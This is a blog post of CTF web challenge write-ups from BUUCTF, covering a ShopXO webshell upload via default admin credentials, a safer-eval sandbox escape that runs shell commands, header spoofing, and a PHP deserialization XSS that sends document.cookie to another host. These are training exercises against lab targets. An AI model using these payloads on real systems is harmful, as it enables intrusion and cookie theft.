BUUCTFweb比赛做题记录

[VNCTF 2021]Ez_game

打开为通过游戏
手打通关是不可能的

法一:在控制台输入winTimer.Set();
在这里插入图片描述
法二:
https://www.sojson.com/jsobfuscator.html
输入winTimer[“endTime”]=99
得到加密,并复制到控制台,回车即可

不可以看全flag,那么就Ctrl和-来放小一点即可
在这里插入图片描述

[GKCTF2020]老八小超市儿

做题之前先来小菜:
在这里插入图片描述
就知道默认后台就是admin.php,
登入的默认账号密码是admin和shopxo。
在这里插入图片描述
输入账号密码
然后就进入到了网站后台
接下来就在应用中心里的应用商店找到主题,然后下载默认主题
在这里插入图片描述
我们可以在_static_里面加上一个test.php
在这里插入图片描述
把一句话写入压缩包,给他一起传上去。
在这里插入图片描述
把马传上去了后就要确定上传路径,回到主页,查看头像那张图片的信息就可以发现(或者查看源码),它的路径里有static,又有default的,跟我们上传的基本一样,基本就可以确定就是这路径了
在这里插入图片描述
或者:
在这里插入图片描述
/public/static/index/default/test.php ,打开验证一下
在这里插入图片描述
http://af230ac6-0877-4907-9494-63938ee208f1.node3.buuoj.cn/public/static/index/default/test.php
连接密码为aa
连接蚁剑
在这里插入图片描述
连接成功后发现目录里有flag和flag.hint
打开flag里面是假flag
在这里插入图片描述
打开hint在这里插入图片描述
然后尝试的打开root目录,发现权限不够
在这里插入图片描述

打开这个标红的auto.sh,发现他60秒运行一次makeflaghint.py的脚本
在这里插入图片描述
前往makeflaghint.py查看
在这里插入图片描述
在这里插入图片描述
进行修改:
在这里插入图片描述
然后再等60秒可以再flag.hint查看到flag:
在这里插入图片描述

[GKCTF2020]EZ三剑客-EzNode

查看源码:
在这里插入图片描述
1.通过/eval?delay=上传一个数字并和60000比较,大的赋值给delay
2.了解到:setTimeout最多只能推迟执行2147483647毫秒(24.8天),超过这个时间会发生溢出,导致回调函数将在当前任务队列结束后立即执行
我们传入一个大于2147483647的值即可
3.百度上去找safer-eval库发现存在漏洞(CVE-2019-10769 )
直接拿来用就行 链接:https://github.com/commenthol/safer-eval/issues/10 漏洞利用如下:
在这里插入图片描述
4.下面看到要post一个e(就是要让我们沙盒逃逸
),结合3得:
e=clearImmediate.constructor(“return process;”)().mainModule.require(“child_process”).execSync(“cat /flag”).toString()

下面就来操作吧:
在这里插入图片描述

[BJDCTF 2nd]假猪套天下第一

登录抓包:
在这里插入图片描述
访问L0g1n.php重新抓包一下
在这里插入图片描述
这里告诉我们需要再等99年,然后考虑到那边有一个time参数,应该就是把那个time改的超过9年就行。在这里插入图片描述
加了一堆数字,然后提示需要localhost(本地),添加一个XFF为127.0.0.1就行
在这里插入图片描述
认不到,那就换一种方法:
在这里插入图片描述
改了client-ip后提示需要从gem-love.com跳转过来,添加一个Referer头就行在这里插入图片描述
现在变成了需要使用Commodo 64浏览器,查一下全称是:Commodore 64,改User-Agent就行。
在这里插入图片描述
改完UA以后需要添加一个邮箱,新增一个From参数即可。在这里插入图片描述
最后代理服务器地址需要是y1ng.vip,添加via
在这里插入图片描述
得到flag的base64编码,解码即可

[BJDCTF 2nd]xss之光

用GitHack-master扫出index.php得到源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

仅看到是一个反序列化,但是不知道类啊,这就遇到了一个反序列化但没有pop链的情况,所以只能找到php内置类来进行反序列化;又发现有个echo;所以我们最好对有_toString方法的类进行反序列化;在 _toString()的原生类反序列化中,常用的是Error和Exception,Error只适于php7,Exception php5和php7都适用

由于此题是xss,所以只要xss执行window.open()就能把flag带出来,所以直接这样:

<?php
$y1ng = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($y1ng));
?>
//window.open 是 javaScript 打开新窗口的方法

也可以用window.location.href='url'来实现恶意跳转
<?php
$a = new Exception("<script>window.location.href='http://659ddbae-4440-42bd-a588-0eba91823671.node3.buuoj.cn/'+document.cookie</script>");
echo urlencode(serialize($a));
?>

或者用alert(document.cookie)直接弹出cookie,但此题不行,可能开了httponly(见附录)。
<?php
$y1ng = new Exception("<script>alert(document.cookie)</script>");
echo urlencode(serialize($y1ng));
?>

结果为:

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A31%3A%22%2Froot%2Fsoft%2Fplayground%2Findex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

访问:

http://659ddbae-4440-42bd-a588-0eba91823671.node3.buuoj.cn/?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A109%3A%22%3Cscript%3Ewindow.open%28%27http%3A%2F%2Fa0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn%2F%3F%27%2Bdocument.cookie%29%3B%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A31%3A%22%2Froot%2Fsoft%2Fplayground%2Findex.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

在这里插入图片描述
或者用bp

[BJDCTF 2nd]elementmaster

在这里插入图片描述
翻译:我是全部118个元素的元素大师!你可能没有感觉,但是放射性射线的症状会无声的杀死你。

查看源码:
在这里插入图片描述
发现id处两串十六进制很奇怪,转换一下得到
0x506F2E ==> Po.
0x706870 ==> php

结合上面,脚本:

import requests

url='http://86512ce4-2a07-43e0-a9f6-edabc83ec7d5.node3.buuoj.cn/'
flag=''
element=['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar',
        'K', 'Ca', 'Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br',
        'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te',
        'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce', 'Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm',
        'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir', 'Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn',
        'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm', 'Bk', 'Cf', 'Es', 'Fm','Md', 'No', 'Lr',
        'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc', 'Lv', 'Ts', 'Og', 'Uue']

for i in element:
        r=requests.get(url+i+'.php')
        if r.status_code == 200:
                flag+=r.text
print (flag)

得到结果And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php
访问得到flag
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值